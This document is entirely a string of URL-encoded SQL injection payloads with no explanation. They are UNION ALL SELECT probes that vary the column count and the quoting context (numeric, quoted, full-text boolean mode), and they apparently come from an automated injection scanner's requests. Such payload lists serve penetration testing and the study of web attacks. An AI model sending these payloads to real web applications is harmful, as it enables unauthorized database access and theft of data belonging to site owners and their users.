-2872%20%2B%20%28SELECT%201857%20FROM%20DUAL%20WHERE%204281%3D4281%20UNION%20ALL%20SELECT%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281%2C%204281--%20%20%29 -2676%20%2B%20%28SELECT%203757%20FROM%20DUAL%20WHERE%203861%3D3861%20UNION%20ALL%20SELECT%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861%2C%203861--%20%20%29 -9597%20%2B%20%28SELECT%206143%20FROM%20DUAL%20WHERE%207661%3D7661%20UNION%20ALL%20SELECT%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661--%20%20%29 -2475%20%2B%20%28SELECT%207409%20FROM%20DUAL%20WHERE%207233%3D7233%20UNION%20ALL%20SELECT%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233%2C%207233--%20%20%29 -4449%20%2B%20%28SELECT%206090%20FROM%20DUAL%20WHERE%202114%3D2114%20UNION%20ALL%20SELECT%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114--%20%20%29 -7467%20%2B%20%28SELECT%206059%20FROM%20DUAL%20WHERE%209223%3D9223%20UNION%20ALL%20SELECT%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223%2C%209223--%20%20%29 -8111%20%2B%20%28SELECT%209650%20FROM%20DUAL%20WHERE%202446%3D2446%20UNION%20ALL%20SELECT%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446--%20%20%29 -7792%20%2B%20%28SELECT%205105%20WHERE%208456%3D8456%20UNION%20ALL%20SELECT%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456%2C%208456--%20%20%29 -6450%20%2B%20%28SELECT%208170%20WHERE%201599%3D1599%20UNION%20ALL%20SELECT%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599%2C%201599--%20%20%29 -3075%20%2B%20%28SELECT%204281%20WHERE%206664%3D6664%20UNION%20ALL%20SELECT%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664%2C%206664--%20%20%29 -9040%20%2B%20%28SELECT%202448%20WHERE%203772%3D3772%20UNION%20ALL%20SELECT%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772%2C%203772--%20%20%29 -9441%20%2B%20%28SELECT%205646%20WHERE%201143%3D1143%20UNION%20ALL%20SELECT%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143%2C%201143--%20%20%29 -1735%20%2B%20%28SELECT%201548%20WHERE%208260%3D8260%20UNION%20ALL%20SELECT%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260--%20%20%29 -2354%20%2B%20%28SELECT%203477%20WHERE%201490%3D1490%20UNION%20ALL%20SELECT%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490%2C%201490--%20%20%29 -3025%20%2B%20%28SELECT%206615%20WHERE%209576%3D9576%20UNION%20ALL%20SELECT%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576%2C%209576--%20%20%29 -5785%20%2B%20%28SELECT%202107%20WHERE%201453%3D1453%20UNION%20ALL%20SELECT%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453%2C%201453--%20%20%29 -4527%20%2B%20%28SELECT%207345%20WHERE%202183%3D2183%20UNION%20ALL%20SELECT%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183%2C%202183--%20%20%29 -8443%27%20%2B%20%28SELECT%20%27MRep%27%20FROM%20DUAL%20WHERE%201012%3D1012%20UNION%20ALL%20SELECT%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012--%20%20%29%20%2B%20%27 -8864%27%20%2B%20%28SELECT%20%27TuYU%27%20FROM%20DUAL%20WHERE%207576%3D7576%20UNION%20ALL%20SELECT%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576--%20%20%29%20%2B%20%27 -7169%27%20%2B%20%28SELECT%20%27UKzB%27%20FROM%20DUAL%20WHERE%205245%3D5245%20UNION%20ALL%20SELECT%205245%2C%205245%2C%205245%2C%205245%2C%205245%2C%205245%2C%205245%2C%205245%2C%205245%2C%205245%2C%205245%2C%205245%2C%205245--%20%20%29%20%2B%20%27 -3236%27%20%2B%20%28SELECT%20%27FSDT%27%20FROM%20DUAL%20WHERE%202044%3D2044%20UNION%20ALL%20SELECT%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044%2C%202044--%20%20%29%20%2B%20%27 -3365%27%20%2B%20%28SELECT%20%27kBeD%27%20FROM%20DUAL%20WHERE%209049%3D9049%20UNION%20ALL%20SELECT%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049--%20%20%29%20%2B%20%27 -2583%27%20%2B%20%28SELECT%20%27OydZ%27%20FROM%20DUAL%20WHERE%207782%3D7782%20UNION%20ALL%20SELECT%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782--%20%20%29%20%2B%20%27 -5584%27%20%2B%20%28SELECT%20%27ZRoz%27%20FROM%20DUAL%20WHERE%205568%3D5568%20UNION%20ALL%20SELECT%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568--%20%20%29%20%2B%20%27 -9384%27%20%2B%20%28SELECT%20%27IZpq%27%20FROM%20DUAL%20WHERE%208413%3D8413%20UNION%20ALL%20SELECT%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413--%20%20%29%20%2B%20%27 -3706%27%20%2B%20%28SELECT%20%27JFtn%27%20FROM%20DUAL%20WHERE%209652%3D9652%20UNION%20ALL%20SELECT%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652%2C%209652--%20%20%29%20%2B%20%27 -6959%27%20%2B%20%28SELECT%20%27zJqa%27%20FROM%20DUAL%20WHERE%202448%3D2448%20UNION%20ALL%20SELECT%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448%2C%202448--%20%20%29%20%2B%20%27 -8349%27%20%2B%20%28SELECT%20%27nomv%27%20WHERE%202920%3D2920%20UNION%20ALL%20SELECT%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920--%20%20%29%20%2B%20%27 -7085%27%20%2B%20%28SELECT%20%27lZVL%27%20WHERE%204557%3D4557%20UNION%20ALL%20SELECT%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557%2C%204557--%20%20%29%20%2B%20%27 -2375%27%20%2B%20%28SELECT%20%27mNtr%27%20WHERE%201019%3D1019%20UNION%20ALL%20SELECT%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019%2C%201019--%20%20%29%20%2B%20%27 -9379%27%20%2B%20%28SELECT%20%27Lmos%27%20WHERE%207113%3D7113%20UNION%20ALL%20SELECT%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113%2C%207113--%20%20%29%20%2B%20%27 -3029%27%20%2B%20%28SELECT%20%27GxjW%27%20WHERE%202549%3D2549%20UNION%20ALL%20SELECT%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549%2C%202549--%20%20%29%20%2B%20%27 -9773%27%20%2B%20%28SELECT%20%27nMwk%27%20WHERE%209256%3D9256%20UNION%20ALL%20SELECT%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256--%20%20%29%20%2B%20%27 -6459%27%20%2B%20%28SELECT%20%27bpxV%27%20WHERE%208890%3D8890%20UNION%20ALL%20SELECT%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890%2C%208890--%20%20%29%20%2B%20%27 -9385%27%20%2B%20%28SELECT%20%27SvqU%27%20WHERE%206431%3D6431%20UNION%20ALL%20SELECT%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431%2C%206431--%20%20%29%20%2B%20%27 -7922%27%20%2B%20%28SELECT%20%27BGRe%27%20WHERE%203618%3D3618%20UNION%20ALL%20SELECT%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618%2C%203618--%20%20%29%20%2B%20%27 -2226%27%20%2B%20%28SELECT%20%27hZJq%27%20WHERE%206592%3D6592%20UNION%20ALL%20SELECT%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592--%20%20%29%20%2B%20%27 -7273%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203540%2C%203540%2C%203540%2C%203540%2C%203540%2C%203540%2C%203540%2C%203540%2C%203540%2C%203540%2C%203540--%20%20%23 -8582%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118%2C%206118--%20%20%23 -8876%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203125%2C%203125%2C%203125%2C%203125%2C%203125%2C%203125%2C%203125%2C%203125%2C%203125%2C%203125%2C%203125%2C%203125%2C%203125--%20%20%23 -2707%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913%2C%202913--%20%20%23 -4898%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297%2C%209297--%20%20%23 -2774%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621%2C%207621--%20%20%23 -7505%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514--%20%20%23 -4716%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252%2C%203252--%20%20%23 -2351%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882--%20%20%23 -7113%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256--%20%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 